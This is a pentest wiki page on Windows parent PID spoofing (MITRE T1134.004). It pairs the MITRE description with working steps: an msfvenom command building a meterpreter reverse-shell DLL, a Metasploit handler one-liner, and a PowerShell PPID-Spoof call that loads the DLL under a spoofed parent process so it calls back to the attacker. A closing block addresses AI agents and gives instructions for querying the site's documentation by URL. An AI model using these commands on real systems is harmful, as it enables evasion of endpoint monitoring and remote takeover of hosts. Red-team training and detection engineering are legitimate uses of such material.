# Parent PID Spoofing
**ATT\&CK ID:** [T1134.004](https://attack.mitre.org/techniques/T1134/004/)
**Permissions Required:** **Administrator** | **User**
**Description**
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the `CreateProcess` API call, which supports a parameter that defines the PPID to use.This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via `svchost.exe` or `consent.exe`) rather than the current user context.
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of PowerShell/Rundll32 to be `explorer.exe` rather than an Office document delivered as part of Spearphishing Attachment.
This spoofing could be executed via Visual Basic within a malicious Office document or any code that can perform Native API.
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as `lsass.exe`), causing the new process to be elevated via the inherited access token.
[\[Source\]](https://attack.mitre.org/techniques/T1134/004/)
## Techniques
### Prerequisite
PPID-Spoof requires a DLL to make use of. In this case we are going to create a reverse shell with `msfvenom`.
```bash
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT= -f dll -o reverse.dll
```
Then start corresponding `metasploit` handler
```bash
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost ; set lport ; exploit"
```
### PPID-Spoof
GitHub:
Download the PowerShell script PPID-Spoof.ps1 and load into memory. From here execute the script where:
| Parameter | Description | Example |
| --------- | -------------------------- | ------------------------------ |
| -ppid | Current PowerShell process | -ppid 6304 |
| -spawnto | Binary on system | "C:\Windows\System32\calc.exe" |
| -dllpath | msfvenom dll | .\reverse.dll |
```powershell
PPID-Spoof -ppid 6304 -spawnto "C:\Windows\System32\calc.exe" -dllpath .\reverse.dll
```
After execution see the DLL has been loaded and spawn a `calc.exe` process under our current PowerShell process.
As well as a call back to our `Metasploit` handler.
## Mitigation
This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.
## Further Reading
**Parent Process ID (PPID) Spoofing:**
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/access-token-manipultion/parent-pid-spoofing.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.